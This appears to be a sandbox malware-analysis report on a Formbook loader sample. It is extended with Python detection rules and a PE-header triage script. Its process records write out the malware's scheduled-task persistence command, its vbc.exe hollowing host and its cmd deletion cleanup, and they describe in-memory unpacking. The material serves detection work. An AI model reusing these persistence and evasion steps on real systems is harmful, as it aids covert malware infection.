          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E2D5E0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE25DD
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E42581
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE1D55
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E10D20
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE2D07
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE2EF7
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E36E30
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EDD616
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE1FF1
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EEDFCE
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE28EC
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E420A0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE20A8
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E2B090
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EEE824
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04ED1002
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E34120
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E1F900
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE22AE
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04ED03DA
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EDDBD2
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E4EBB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE2B28
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_030F2FB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_0310C603
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_030F2D90
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_0310CC13
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_030F8C60
          Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe 767B1B32D4AC4CEC73967590CA5B28C3E0F4D709C0773E3F4021774F15A2483A
          Source: C:\Windows\SysWOW64\control.exe | Code function: String function: 04E1B150 appears 45 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: String function: 053CB150 appears 45 times
          Source: J0OmHIagw8.exe | Binary or memory string: OriginalFilename vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe, 00000000.00000002.241605025.000000000442C000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe, 00000000.00000002.242728474.0000000006AF0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe, 00000000.00000002.242891757.0000000006BE0000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe, 00000000.00000002.242891757.0000000006BE0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe | Binary or memory string: OriginalFilename2 vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: J0OmHIagw8.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: JcEEHoQdnETCO.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.cs | Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
          Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.cs | Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs | Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
          Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs | Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.cs | Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
          Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.cs | Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs | Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
          Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs | Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@12/3@20/11
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | File created: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Mutant created: \Sessions\1\BaseNamedObjects\BrtavqaRGzDKtjCLSCLufFEEs
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4552:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_01
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | File created: C:\Users\user\AppData\Local\Temp\tmpF65F.tmp
          Source: J0OmHIagw8.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: J0OmHIagw8.exe | Virustotal: Detection: 31%
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | File read: C:\Users\user\Desktop\J0OmHIagw8.exe
          Source: unknown | Process created: C:\Users\user\Desktop\J0OmHIagw8.exe 'C:\Users\user\Desktop\J0OmHIagw8.exe'
          Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
          Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
          Source: unknown | Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
          Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: J0OmHIagw8.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: J0OmHIagw8.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: J0OmHIagw8.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: control.pdb source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, control.exe, 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, control.exe
          Source: Binary string: vbc.pdb source: control.exe, 00000008.00000002.576699588.00000000055C7000.00000004.00000001.sdmp
          Source: Binary string: control.pdbUGP source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp
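          The process-creation records above are the telemetry behind the "Scheduled temp file as task from temp location" Sigma hit in the signature list: schtasks.exe is asked to /Create a task from an XML file in the user's Temp directory, the .NET compiler vbc.exe is started by a program in the user's profile with a command line that is only a placeholder (the host for the hollowed Formbook payload), and control.exe later spawns cmd.exe to delete that vbc.exe host. The block below is an added example and not part of the Joe Sandbox report: three detection rules run over constructed process-creation events whose command lines are copied from the records above plus one benign schtasks control. The event field names (image, parent_image, command_line), the list of .NET host binaries and the exact rule logic are assumptions of this example, not the sandbox's own rules.

```python
import ntpath
import re

# Constructed process-creation events (Sysmon Event ID 1 style field names are
# an assumption of this example). Command lines are copied from the report;
# the last event is a constructed benign control.
EVENTS = [
    {"image": r"C:\Users\user\Desktop\J0OmHIagw8.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"'C:\Users\user\Desktop\J0OmHIagw8.exe'"},
    {"image": r"C:\Windows\SysWOW64\schtasks.exe",
     "parent_image": r"C:\Users\user\Desktop\J0OmHIagw8.exe",
     "command_line": r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe",
     "parent_image": r"C:\Users\user\Desktop\J0OmHIagw8.exe",
     "command_line": "{path}"},
    {"image": r"C:\Windows\SysWOW64\cmd.exe",
     "parent_image": r"C:\Windows\SysWOW64\control.exe",
     "command_line": r"/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'"},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"schtasks.exe /Create /TN 'Backup\Nightly' /XML 'C:\ProgramData\Backup\nightly.xml'"},
]

# Temp locations a task definition should never be imported from (assumption).
TEMP_DIR_RE = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\", re.I)
# Value of the /XML argument, with or without surrounding quotes.
XML_ARG_RE = re.compile(r"/xml\s+['\"]?([^'\"]+)", re.I)
DEL_RE = re.compile(r"/c\s+del\b", re.I)
# .NET framework utilities commonly abused as hollowing hosts (assumption).
DOTNET_HOSTS = {"vbc.exe", "csc.exe", "msbuild.exe", "regasm.exe", "regsvcs.exe"}


def basename(path):
    return ntpath.basename(path).lower()


def rule_schtasks_from_temp(ev):
    """schtasks /Create whose /XML definition lives in a Temp directory."""
    if basename(ev["image"]) != "schtasks.exe":
        return False
    cmd = ev["command_line"]
    if not re.search(r"/create\b", cmd, re.I):
        return False
    m = XML_ARG_RE.search(cmd)
    return bool(m and TEMP_DIR_RE.search(m.group(1)))


def rule_dotnet_host_from_user_dir(ev):
    """A .NET framework utility started by something under C:\\Users."""
    return (basename(ev["image"]) in DOTNET_HOSTS
            and ev["parent_image"].lower().startswith("c:\\users\\"))


def rule_cmd_del_windows_binary(ev):
    """cmd /c del aimed at an .exe under C:\\Windows (host clean-up)."""
    cmd = ev["command_line"]
    return (basename(ev["image"]) == "cmd.exe"
            and DEL_RE.search(cmd) is not None
            and re.search(r"\\windows\\.*\.exe", cmd, re.I) is not None)


RULES = {
    "schtasks_create_from_temp": rule_schtasks_from_temp,
    "dotnet_host_spawned_from_user_dir": rule_dotnet_host_from_user_dir,
    "cmd_del_windows_binary": rule_cmd_del_windows_binary,
}


def evaluate(events):
    """Return (rule name, image basename) for every event that trips a rule."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, basename(ev["image"])))
    return hits


if __name__ == "__main__":
    for rule_name, image in evaluate(EVENTS):
        print(f"{rule_name}: {image}")
```

          Run as written, the three events copied from the report each trip one rule and the benign schtasks control trips none; the temp-directory rule keys on where the XML comes from rather than on the task name, so it survives the random task names this loader generates.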

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.cs | .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.cs | .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs | .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs | .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Binary contains a suspicious time stamp
          Source: initial sample | Static PE information: 0x8C6CE96A [Sat Aug 27 21:58:02 2044 UTC]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041508E push ebp; iretd | 5_2_0041508F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041C9C8 push dword ptr [ECF9F4C6h]; ret | 5_2_0041C9EA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0040C2CA push ds; retf | 5_2_0040C2E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0040C31A push ds; retf | 5_2_0040C31E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_004153DF pushad ; ret | 5_2_004153E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041B3B5 push eax; ret | 5_2_0041B408
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041B46C push eax; ret | 5_2_0041B472
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041B402 push eax; ret | 5_2_0041B408
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041B40B push eax; ret | 5_2_0041B472
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_00414DDA pushfd ; retf | 5_2_00414DDB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0040EEAA push esp; retf | 5_2_0040EEAF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0541D0D1 push ecx; ret | 5_2_0541D0E4
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E6D0D1 push ecx; ret | 8_2_04E6D0E4
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_030FC31A push ds; retf | 8_2_030FC31E
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_0310B3B5 push eax; ret | 8_2_0310B408
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_031053DF pushad ; ret | 8_2_031053E0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_030FC2CA push ds; retf | 8_2_030FC2E5
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_0310C9C8 push dword ptr [ECF9F4C6h]; ret | 8_2_0310C9EA
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_0310508E push ebp; iretd | 8_2_0310508F
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_030FEEAA push esp; retf | 8_2_030FEEAF
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_03104DDA pushfd ; retf | 8_2_03104DDB
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_0310B402 push eax; ret | 8_2_0310B408
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_0310B40B push eax; ret | 8_2_0310B472
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_0310B46C push eax; ret | 8_2_0310B472
          Source: initial sample | Static PE information: section name: .text entropy: 7.87325624696
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | File created: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe
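          Two of the static indicators in this section come straight out of the PE headers: the COFF TimeDateStamp 0x8C6CE96A decodes to a date in 2044, which no genuine build can carry, and the .text section has an entropy of 7.87 out of a maximum of 8.0, which together with the Assembly.Load(System.Byte[]) call above is what a .NET loader looks like when the real payload is stored encrypted and unpacked in memory. The block below is an added example, not code from the report: a minimal PE header parser that pulls the timestamp and the per-section Shannon entropy, applied to a constructed PE image that carries the report's timestamp and a fully random executable section. The 7.0 entropy threshold, the 2021-01-15 reference date and the test image itself are assumptions of this example, not the sandbox's scoring.

```python
import math
import struct
from collections import Counter
from datetime import datetime, timezone

ENTROPY_THRESHOLD = 7.0       # assumption: common packed-code heuristic
IMAGE_SCN_MEM_EXECUTE = 0x20000000
# Reference date used for the future-timestamp check (assumption of the example).
REFERENCE_NOW = datetime(2021, 1, 15, tzinfo=timezone.utc)


def build_test_pe(timestamp, sections):
    """Build a minimal 32-bit PE image (DOS header, PE signature, COFF header,
    zeroed optional header, section table, raw section data). Constructed test
    data for this example, not the analysed sample."""
    e_lfanew = 0x80
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)   # e_lfanew at 0x3C
    dos += b"\0" * (e_lfanew - len(dos))
    opt_size = 0xE0
    # Machine=i386, NumberOfSections, TimeDateStamp, symtab, nsyms,
    # SizeOfOptionalHeader, Characteristics=EXECUTABLE_IMAGE|32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)    # PE32 magic
    raw_off = e_lfanew + 4 + len(coff) + opt_size + 40 * len(sections)
    table, blobs = b"", b""
    for i, (name, data, chars) in enumerate(sections):
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             len(data), 0x1000 * (i + 1), len(data),
                             raw_off + len(blobs), 0, 0, 0, 0, chars)
        blobs += data
    return dos + b"PE\0\0" + coff + opt + table + blobs


def parse_pe(data):
    """Return machine, COFF timestamp, characteristics and the section table
    (name, raw bytes, characteristics) of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    table_off = e_lfanew + 4 + 20 + opt_size
    sections = []
    for i in range(nsec):
        name, _, _, rawsize, rawptr, _, _, _, _, sec_chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, table_off + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "data": data[rawptr:rawptr + rawsize],
                         "characteristics": sec_chars})
    return {"machine": machine, "timestamp": ts, "characteristics": chars, "sections": sections}


def shannon_entropy(blob):
    """Shannon entropy in bits per byte, 0.0 to 8.0."""
    if not blob:
        return 0.0
    n = len(blob)
    # "or 0.0" turns the -0.0 produced for a single-symbol blob into 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(blob).values()) or 0.0


def format_timestamp(ts):
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def triage(data, now=None):
    """Flag a compile timestamp later than `now` and any executable section
    whose entropy is at or above ENTROPY_THRESHOLD."""
    now = now or datetime.now(timezone.utc)
    pe = parse_pe(data)
    findings = []
    ts = pe["timestamp"]
    if datetime.fromtimestamp(ts, tz=timezone.utc) > now:
        findings.append(f"timestamp 0x{ts:08X} [{format_timestamp(ts)}] is in the future")
    for sec in pe["sections"]:
        h = shannon_entropy(sec["data"])
        if h >= ENTROPY_THRESHOLD and sec["characteristics"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"section {sec['name']} entropy {h:.2f} (executable, likely packed)")
    return findings


# Constructed test image: the report's timestamp, a .text section in which
# every byte value occurs equally often (entropy exactly 8.0) and a plain
# .rdata section (entropy 0.0).
SAMPLE_TIMESTAMP = 0x8C6CE96A
PACKED_TEXT = bytes(range(256)) * 4
PLAIN_RDATA = b"A" * 1024
SAMPLE_PE = build_test_pe(SAMPLE_TIMESTAMP, [
    (".text", PACKED_TEXT, 0x60000020),    # CODE | MEM_EXECUTE | MEM_READ
    (".rdata", PLAIN_RDATA, 0x40000040),   # INITIALIZED_DATA | MEM_READ
])

if __name__ == "__main__":
    for finding in triage(SAMPLE_PE, REFERENCE_NOW):
        print(finding)
```

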